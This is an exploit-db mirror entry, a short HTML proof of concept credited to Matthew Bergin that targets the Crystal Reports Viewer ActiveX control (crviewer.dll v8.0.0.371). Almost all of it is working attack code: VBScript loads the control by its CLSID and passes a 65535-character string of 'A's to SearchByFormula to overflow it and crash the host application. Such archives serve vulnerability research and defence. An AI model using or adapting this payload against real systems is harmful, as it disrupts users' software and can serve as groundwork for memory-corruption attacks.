exploit-db-mirror/exploits/windows/dos/15408.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

21 lines
505 B
HTML

<html>
Crystal Reporting Viewer v8.0.0.371
Author: Matthew Bergin
Website: www.berginpentesting.com
Website: www.smashthestack.org
<object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\crviewer.dll"
prototype = "Sub SearchByFormula ( ByVal formula As String )"
memberName = "SearchByFormula"
progid = "CRVIEWERLib.CRViewer"
argCount = 1
arg1=String(65535, "A")
target.SearchByFormula arg1
</script>